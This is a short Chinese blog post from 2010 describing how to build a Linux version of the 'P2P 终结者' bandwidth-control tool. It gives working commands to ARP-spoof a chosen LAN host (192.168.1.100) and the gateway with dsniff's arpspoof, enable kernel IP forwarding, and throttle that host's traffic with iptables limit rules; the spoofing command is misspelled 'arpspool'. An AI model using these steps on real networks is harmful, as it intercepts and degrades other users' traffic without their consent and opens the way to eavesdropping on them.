P2P 终结者 for Linux

Posted on November 2, 2010

很长一段时间,都在渴望一个 for Linux 的 P2P 终结者。

但是,谁让我们是小众群体呢?所以,没有。

但是,今天我突发奇想,找到了!用脚本实现了 P2P 终结者!

问题是这样的,首先我需要一个 arp 欺骗工具。呵呵, dsniff 就是!

执行 arpspoof 就可以进行 ARP 欺骗了。 不过,呵呵,我只对需要控制的主机进行 ARP 欺骗,比如 192.168.1.100

arpspool -i eth0 -t 192.168.1.100 192.168.1.1 
arpspool -i eth0 -t 192.168.1.1 192.168.1.100 

这样成功的让 192.168.1.100 到 192.168.1.1 之间的通讯全部通过自己了

然后,我打开 内核的 IP 转发。 echo 1 > /proc/sys/net/ipv4/ip_forward

呵呵,现在,怎么限速就是我的事情啦! 可以使用 tc 限速,也可以简单的时候 iptables 限速! 比如,使用 iptables 的 limit 匹配模块来限速. 一秒钟是能发送和接收 3 个数据包,这样速度就限制到 4k/s 了

iptables -A FORWARD -s 192.168.1.100 -m limit --limit 3/s -j ACCEPT          
iptables -A FORWARD -d 192.168.1.100 -m limit --limit 3/s -j ACCEPT                 
iptables -A FORWARD -s 192.168.1.100  -j DROP                                                
iptables -A FORWARD -d 192.168.1.100  -j DROP                                             
Comments